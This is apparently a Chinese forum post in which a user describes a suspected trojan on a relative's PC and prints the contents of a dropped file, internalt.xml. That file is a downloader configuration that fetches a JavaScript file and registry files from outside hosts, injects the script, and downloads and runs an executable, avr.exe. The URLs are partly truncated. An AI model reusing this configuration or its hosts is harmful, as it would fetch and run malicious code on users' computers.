弟弟的电脑.今天上网时.突然桌面都没啦!!
防毒_PCC2004..却没出现病毒!这时查看档案..多了 internalt.xml G4Y_Header.js
他EMail给我(附加二个档案).我的卡巴基也没有扫到..但G4Y_Header.js被OutLook EXpress档了下来.
internalt.xml用记事本开启如下:
<?xml version="1.0" encoding="utf-8"?><config>
<add_remove_hide />
<download url="
http://195.225.177.20/ourb...er.js" file="%windir%\g4y_header.js" />
<insertjs srcurl="file://%windir%/g4y_header.js" />
<registry url="
http://195.225.177.20/ourb...e.reg" />
<registry url="
http://ambush-script.com/ld/...go.reg" />
<download url="
http://195.225.177.20/o...exe" file="%windir%\avr.exe" />
<run command="%windir%\avr.exe" />
</config>
这是木马吧!!